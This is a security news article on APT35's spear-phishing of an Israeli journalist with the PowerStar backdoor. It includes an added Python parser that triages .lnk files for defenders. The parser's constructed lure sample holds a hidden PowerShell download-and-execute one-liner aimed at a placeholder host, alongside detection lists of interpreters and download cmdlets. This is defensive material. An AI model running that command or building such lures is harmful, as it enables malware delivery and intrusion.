Iran-Linked APT35 Targets Israeli Media With Upgraded Spear-Phishing Tools

Published: 23/11/2024   Category: security


The APT35 group (aka Charming Kitten) has added backdoor capabilities to their spear-phishing payloads — and targeted an Israeli reporter with it.



The Iran-linked threat group known as APT35 (aka Charming Kitten, Imperial Kitten, or Tortoiseshell) has updated its cyberattack arsenal with improved abilities to hide its actions, as well as an upgraded custom backdoor that it's distributing via a spear-phishing campaign.
The advanced persistent threat (APT) is alleged to operate out of Iran and to be primarily concerned with collecting intelligence by compromising account credentials and, subsequently, the email accounts of the individuals it successfully spear-phishes.
According to a blog post published by Volexity, the group recently attempted a spear-phishing campaign targeting an Israeli journalist with a draft-report lure. The draft report was a password-protected RAR file containing a malicious LNK file, which downloaded a backdoor.
The incident was a highly targeted attack. Before sending any malware to the victim, the attackers asked whether the person would be open to reviewing a document they had written on US foreign policy. The target agreed, since this is not an unusual request in journalism, but APT35 didn't send the document right away. Instead, the attackers continued the interaction with another benign email containing a list of questions, to which the target responded with answers. After multiple days of benign and seemingly legitimate interaction, the attackers finally sent the draft report loaded with malware.
Toby Lewis, global head of threat analysis at Darktrace, says APT35's targeting profile is very much in the theme of what you'd expect to see from a group associated with the Iranian government. He says: "This is a group that's trying to be bespoke, be stealthy, and stay under the radar, and so to do that you're also going to really focus your social engineering to try and improve that return on the investment."
In this most recent campaign, it delivered the PowerStar malware, an updated version of one of its known backdoors, CharmPower, which it sent via an email containing an .LNK file inside a password-protected .RAR file.
When executed by a user, the .LNK file downloads PowerStar from the Backblaze hosting provider and from attacker-controlled infrastructure, according to Volexity's report. PowerStar then collects a small amount of system information from the compromised machine and sends it via a POST request to a command-and-control (C2) address that is itself downloaded from Backblaze.
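The archive-wrapped LNK described above is the point in this chain where a defender can still catch the lure before any payload runs, because the shortcut file carries its target and command line in clear text. What follows is an added example, not code from the article or from Volexity: a minimal parser for the Windows Shell Link (.lnk) format, following the public MS-SHLLINK layout, that extracts the target path, command-line arguments and window state, and a triage pass that flags interpreter targets, download cmdlets and hidden windows. The two .lnk files it inspects are constructed inline; the PowerShell one-liner, the files.example.invalid URL and the indicator lists are illustrative assumptions, not the actual PowerStar loader command. Extraction from the password-protected RAR is out of scope; the parser works on the already-extracted .lnk bytes.

```python
import struct

# Header layout and LinkFlags bits from the public MS-SHLLINK specification.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
SW_SHOWMINNOACTIVE = 7  # target starts minimised; lure LNKs use it to hide the console

# StringData blocks appear in exactly this order when their flag is set.
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))

# Illustrative indicator lists (assumptions for this example, not a vetted ruleset).
INTERPRETERS = ("powershell", "pwsh", "cmd.exe", "mshta", "wscript", "cscript",
                "rundll32", "regsvr32", "certutil")
DOWNLOAD_HINTS = ("http://", "https://", "downloadstring", "downloadfile",
                  "invoke-webrequest", "iwr ", "start-bitstransfer", "iex ",
                  "invoke-expression", "-enc", "-encodedcommand", "frombase64string")


def _read(data, fmt, off):
    """Bounds-checked unpack; malformed files raise ValueError, not struct.error."""
    if off + struct.calcsize(fmt) > len(data):
        raise ValueError("truncated .lnk file")
    return struct.unpack_from(fmt, data, off)[0]


def parse_lnk(data: bytes) -> dict:
    """Extract the fields a triage analyst cares about from raw .lnk bytes."""
    if len(data) < 0x4C or _read(data, "<I", 0) != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link (.lnk) file")
    flags = _read(data, "<I", 0x14)
    info = {"flags": flags, "show_command": _read(data, "<I", 0x3C)}
    off = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:   # skip IDList: 2-byte size, then that many bytes
        off += 2 + _read(data, "<H", off)
    if flags & HAS_LINK_INFO:             # skip LinkInfo: 4-byte size that includes itself
        off += _read(data, "<I", off)
    unicode = bool(flags & IS_UNICODE)
    for flag, name in STRING_FIELDS:
        if not flags & flag:
            continue
        count = _read(data, "<H", off)    # CountCharacters, no terminator
        off += 2
        nbytes = count * 2 if unicode else count
        if off + nbytes > len(data):
            raise ValueError(f"truncated {name} string")
        raw = data[off:off + nbytes]
        off += nbytes
        info[name] = raw.decode("utf-16-le") if unicode else raw.decode("cp1252")
    return info


def triage(info: dict) -> list:
    """Return human-readable findings; an empty list means nothing stood out."""
    findings = []
    target = (info.get("relative_path", "") + " " + info.get("name", "")).lower()
    args = info.get("arguments", "").lower()
    if any(i in target for i in INTERPRETERS):
        findings.append(f"target is a script interpreter or LOLBin: {info.get('relative_path')}")
    hits = [h for h in DOWNLOAD_HINTS if h in args]
    if hits:
        findings.append(f"arguments carry download/execution indicators: {hits}")
    if "-w hidden" in args or "-windowstyle hidden" in args or info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("window hidden or minimised at launch")
    if len(args) > 200:
        findings.append(f"unusually long argument string ({len(args)} chars)")
    return findings


def build_lnk(relative_path, arguments, icon_location=None, show_command=1) -> bytes:
    """Build a minimal Unicode .lnk (header + StringData only) for constructed samples."""
    flags = IS_UNICODE | HAS_RELATIVE_PATH | HAS_ARGUMENTS | (HAS_ICON_LOCATION if icon_location else 0)
    header = bytearray(0x4C)
    struct.pack_into("<I", header, 0, 0x4C)
    header[4:20] = LNK_CLSID
    struct.pack_into("<I", header, 0x14, flags)
    struct.pack_into("<I", header, 0x3C, show_command)

    def s(text):  # CountCharacters + UTF-16LE string
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    body = s(relative_path) + s(arguments) + (s(icon_location) if icon_location else b"")
    return bytes(header) + body


# Constructed samples: a lure-style shortcut and an ordinary one.
LURE_ARGS = ('-w hidden -nop -c "iex (New-Object Net.WebClient)'
             ".DownloadString('https://files.example.invalid/draft-report.txt')\"")
LURE = build_lnk(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", LURE_ARGS,
                 icon_location=r"%SystemRoot%\System32\imageres.dll", show_command=SW_SHOWMINNOACTIVE)
BENIGN = build_lnk(r"..\..\Program Files\Notepad++\notepad++.exe", "notes.txt")

if __name__ == "__main__":
    for label, blob in (("lure", LURE), ("benign", BENIGN)):
        print(label, triage(parse_lnk(blob)) or "clean")
```

The parser deliberately stops after StringData; the trailing ExtraData blocks (tracker, environment, console properties) are skipped, which is enough for first-pass triage and keeps the code short. In a mail gateway or sandbox, the same two functions would be run over every .lnk pulled out of an attachment archive, and a non-empty findings list would quarantine the message for analyst review.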
Volexity believes this variant of PowerStar to be especially complex and suspects that it is likely supported by a custom server-side component that automates simple actions for the malware operator. In addition, the decryption function is fetched from remotely hosted files rather than shipped with the initial payload, which hinders detection of the malware outside of memory and gives the attackers a kill switch to prevent future analysis of the malware's key functionality.
"With PowerStar, Charming Kitten sought to limit the risk of exposing their malware to analysis and detection by delivering the decryption method separately from the initial code and never writing it to disk," the company said. "This has the added bonus of acting as an operational guardrail, as decoupling the decryption method from its command-and-control server prevents future successful decryption of the corresponding PowerStar payload."
Lewis says that the quest for return on investment among APT groups sometimes drives relatively unsophisticated, low-effort campaigns, but more often, "you've got groups that are going to get as sophisticated as they need to be to meet their objectives." What that means can run the gamut: Some will be able to develop zero-days, as opposed to just using something they got from somebody else; others will demonstrate sophistication in how they manage and control their infrastructure.
The latter is the case with APT35. "When you've got the tradecraft that we've got this group using, effectively bringing down custom payloads, it's bringing down different modules from third-party services," he says. "Each different payload is going to be a little bit different, a little bit tweaked, and a little bit tuned, and ... that sort of approach is absolutely what you'd expect to see."
Nonetheless, Volexity researchers said they regularly observe operations from the APT but find that the group rarely deploys malware as part of its attacks. This sparing use of malware likely increases the difficulty of tracking its activity, according to the firm.
APT35 has been active for more than a decade. According to a 2021 blog from Darktrace, APT35 has in that time launched extensive campaigns against organizations and officials across North America and the Middle East; public attribution has characterized APT35 as an Iran-based nation-state threat actor. Recent campaigns were suspected to be in service of Iran's potential physical targeting of dissenters for kidnapping and other kinetic operations.
